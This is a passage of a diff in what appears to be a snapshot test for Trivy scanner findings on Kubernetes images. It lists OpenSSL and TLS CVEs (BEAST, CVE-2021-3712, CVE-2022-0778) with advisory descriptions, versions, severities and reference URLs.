+ "http://www.ibm.com/developerworks/java/jdk/alerts/", + "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", + "http://www.insecure.cl/Beast-SSL.rar", + "http://www.kb.cert.org/vuls/id/864643", + "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", + "http://www.opera.com/docs/changelogs/mac/1151/", + "http://www.opera.com/docs/changelogs/mac/1160/", + "http://www.opera.com/docs/changelogs/unix/1151/", + "http://www.opera.com/docs/changelogs/unix/1160/", + "http://www.opera.com/docs/changelogs/windows/1151/", + "http://www.opera.com/docs/changelogs/windows/1160/", + "http://www.opera.com/support/kb/view/1004/", + "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", + "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", + "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", + "http://www.redhat.com/support/errata/RHSA-2011-1384.html", + "http://www.redhat.com/support/errata/RHSA-2012-0006.html", + "http://www.securityfocus.com/bid/49388", + "http://www.securityfocus.com/bid/49778", + "http://www.securitytracker.com/id/1029190", + "http://www.securitytracker.com/id?1025997", + "http://www.securitytracker.com/id?1026103", + "http://www.securitytracker.com/id?1026704", + "http://www.ubuntu.com/usn/USN-1263-1", + "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", + "https://access.redhat.com/security/cve/CVE-2011-3389", + "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", + "https://bugzilla.novell.com/show_bug.cgi?id=719047", + "https://bugzilla.redhat.com/show_bug.cgi?id=737506", + "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", + "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", + "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", + "https://hermes.opensuse.org/messages/13154861", + "https://hermes.opensuse.org/messages/13155432", + "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", + "https://linux.oracle.com/cve/CVE-2011-3389.html", + "https://linux.oracle.com/errata/ELSA-2011-1380.html", + "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", + "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", + "https://ubuntu.com/security/notices/USN-1263-1", + "https://www.cve.org/CVERecord?id=CVE-2011-3389", + ], + }, + "category": "Vulnerability", + "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "value": "https://avd.aquasec.com/nvd/cve-2011-3389", }, { "type": "URL", - "value": "https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html", + "value": "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3450", + "value": "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "value": "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0056.html", + "value": "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", }, { "type": "URL", - "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "value": "http://curl.haxx.se/docs/adv_20120124B.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "http://downloads.asterisk.org/pub/security/AST-2016-001.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", + "value": "http://ekoparty.org/2011/juliano-rizzo.php", }, { "type": "URL", - "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "value": "http://eprint.iacr.org/2004/111", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3450", + "value": "http://eprint.iacr.org/2006/136", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210325.txt", + "value": "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-05", + "value": "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-08", + "value": "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1l-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-3712", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/26/2", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", - "https://access.redhat.com/security/cve/CVE-2021-3712", - "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", - "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", - "https://linux.oracle.com/cve/CVE-2021-3712.html", - "https://linux.oracle.com/errata/ELSA-2022-9023.html", - "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", - "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", - "https://security.gentoo.org/glsa/202209-02", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20210827-0010/", - "https://ubuntu.com/security/notices/USN-5051-1", - "https://ubuntu.com/security/notices/USN-5051-2", - "https://ubuntu.com/security/notices/USN-5051-3", - "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", - "https://ubuntu.com/security/notices/USN-5088-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3712", - "https://www.debian.org/security/2021/dsa-4963", - "https://www.openssl.org/news/secadv/20210824.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-16", - "https://www.tenable.com/security/tns-2022-02", - ], - }, - "category": "Vulnerability", - "description": "ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "openssl: Read buffer overruns processing ASN.1 strings", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3712", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3712", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", + "value": "http://marc.info/?l=bugtraq&m=132750579901589&w=2", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "http://marc.info/?l=bugtraq&m=132872385320240&w=2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", + "value": "http://marc.info/?l=bugtraq&m=133365109612558&w=2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", + "value": "http://marc.info/?l=bugtraq&m=133728004526190&w=2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", + "value": "http://marc.info/?l=bugtraq&m=134254866602253&w=2", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", + "value": "http://marc.info/?l=bugtraq&m=134254957702612&w=2", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "value": "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3712.html", + "value": "http://osvdb.org/74829", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9023.html", + "value": "http://rhn.redhat.com/errata/RHSA-2012-0508.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "value": "http://rhn.redhat.com/errata/RHSA-2013-1455.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "value": "http://secunia.com/advisories/45791", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", + "value": "http://secunia.com/advisories/47998", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", + "value": "http://secunia.com/advisories/48256", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", + "value": "http://secunia.com/advisories/48692", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", + "value": "http://secunia.com/advisories/48915", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-02", + "value": "http://secunia.com/advisories/48948", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "http://secunia.com/advisories/49198", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", + "value": "http://secunia.com/advisories/55322", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-1", + "value": "http://secunia.com/advisories/55350", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-2", + "value": "http://secunia.com/advisories/55351", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-3", + "value": "http://security.gentoo.org/glsa/glsa-201203-02.xml", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", + "value": "http://security.gentoo.org/glsa/glsa-201406-32.xml", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5088-1", + "value": "http://support.apple.com/kb/HT4999", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3712", + "value": "http://support.apple.com/kb/HT5001", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4963", + "value": "http://support.apple.com/kb/HT5130", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210824.txt", + "value": "http://support.apple.com/kb/HT5281", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "http://support.apple.com/kb/HT5501", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "http://support.apple.com/kb/HT6150", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "http://technet.microsoft.com/security/advisory/2588513", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-16", + "value": "http://vnhacker.blogspot.com/2011/09/beast.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-02", + "value": "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2022-0778", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", - "references": [ - "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", - "http://seclists.org/fulldisclosure/2022/May/33", - "http://seclists.org/fulldisclosure/2022/May/35", - "http://seclists.org/fulldisclosure/2022/May/38", - "https://access.redhat.com/errata/RHSA-2022:5326", - "https://access.redhat.com/security/cve/CVE-2022-0778", - "https://bugzilla.redhat.com/2062202", - "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", - "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", - "https://errata.almalinux.org/8/ALSA-2022-5326.html", - "https://errata.rockylinux.org/RLSA-2022:4899", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", - "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", - "https://linux.oracle.com/cve/CVE-2022-0778.html", - "https://linux.oracle.com/errata/ELSA-2022-9272.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", - "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220321-0002/", - "https://security.netapp.com/advisory/ntap-20220429-0005/", - "https://support.apple.com/kb/HT213255", - "https://support.apple.com/kb/HT213256", - "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5328-1", - "https://ubuntu.com/security/notices/USN-5328-2", - "https://www.cve.org/CVERecord?id=CVE-2022-0778", - "https://www.debian.org/security/2022/dsa-5103", - "https://www.openssl.org/news/secadv/20220315.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.tenable.com/security/tns-2022-06", - "https://www.tenable.com/security/tns-2022-07", - "https://www.tenable.com/security/tns-2022-08", - "https://www.tenable.com/security/tns-2022-09", - ], - }, - "category": "Vulnerability", - "description": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0778", + "value": "http://www.debian.org/security/2012/dsa-2398", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", + "value": "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/33", + "value": "http://www.ibm.com/developerworks/java/jdk/alerts/", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/35", + "value": "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/38", + "value": "http://www.insecure.cl/Beast-SSL.rar", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5326", + "value": "http://www.kb.cert.org/vuls/id/864643", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0778", + "value": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2062202", + "value": "http://www.opera.com/docs/changelogs/mac/1151/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", + "value": "http://www.opera.com/docs/changelogs/mac/1160/", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", + "value": "http://www.opera.com/docs/changelogs/unix/1151/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", + "value": "http://www.opera.com/docs/changelogs/unix/1160/", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5326.html", + "value": "http://www.opera.com/docs/changelogs/windows/1151/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4899", + "value": "http://www.opera.com/docs/changelogs/windows/1160/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", + "value": "http://www.opera.com/support/kb/view/1004/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", + "value": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", + "value": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", + "value": "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-0778.html", + "value": "http://www.redhat.com/support/errata/RHSA-2011-1384.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9272.html", + "value": "http://www.redhat.com/support/errata/RHSA-2012-0006.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "value": "http://www.securityfocus.com/bid/49388", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", + "value": "http://www.securityfocus.com/bid/49778", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", + "value": "http://www.securitytracker.com/id/1029190", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", + "value": "http://www.securitytracker.com/id?1025997", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", + "value": "http://www.securitytracker.com/id?1026103", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", + "value": "http://www.securitytracker.com/id?1026704", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", + "value": "http://www.ubuntu.com/usn/USN-1263-1", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", + "value": "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://access.redhat.com/security/cve/CVE-2011-3389", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220321-0002/", + "value": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0005/", + "value": "https://bugzilla.novell.com/show_bug.cgi?id=719047", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=737506", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5328-1", + "value": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5328-2", + "value": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0778", + "value": "https://hermes.opensuse.org/messages/13154861", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5103", + "value": "https://hermes.opensuse.org/messages/13155432", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220315.txt", + "value": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://linux.oracle.com/cve/CVE-2011-3389.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://linux.oracle.com/errata/ELSA-2011-1380.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-06", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-07", + "value": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-08", + "value": "https://ubuntu.com/security/notices/USN-1263-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-09", + "value": "https://www.cve.org/CVERecord?id=CVE-2011-3389", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1i-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2020-1971", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", + "fixedVersion": "3.4.1-1+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20305", + "installedVersion": "3.4.1-1", + "packageName": "libhogweed4", "references": [ - "http://www.openwall.com/lists/oss-security/2021/09/14/2", - "https://access.redhat.com/security/cve/CVE-2020-1971", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44676", - "https://linux.oracle.com/cve/CVE-2020-1971.html", - "https://linux.oracle.com/errata/ELSA-2021-9150.html", - "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3Ccommits.pulsar.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html", - "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DGSI34Y5LQ5RYXN4M2I5ZQT65LFVDOUU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWPSSZNZOBJU2YR6Z4TGHXKYW3YP5QG7/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1971", - "https://security.FreeBSD.org/advisories/FreeBSD-SA-20:33.openssl.asc", - "https://security.gentoo.org/glsa/202012-13", - "https://security.netapp.com/advisory/ntap-20201218-0005/", - "https://security.netapp.com/advisory/ntap-20210513-0002/", - "https://ubuntu.com/security/notices/USN-4662-1", - "https://ubuntu.com/security/notices/USN-4745-1", - 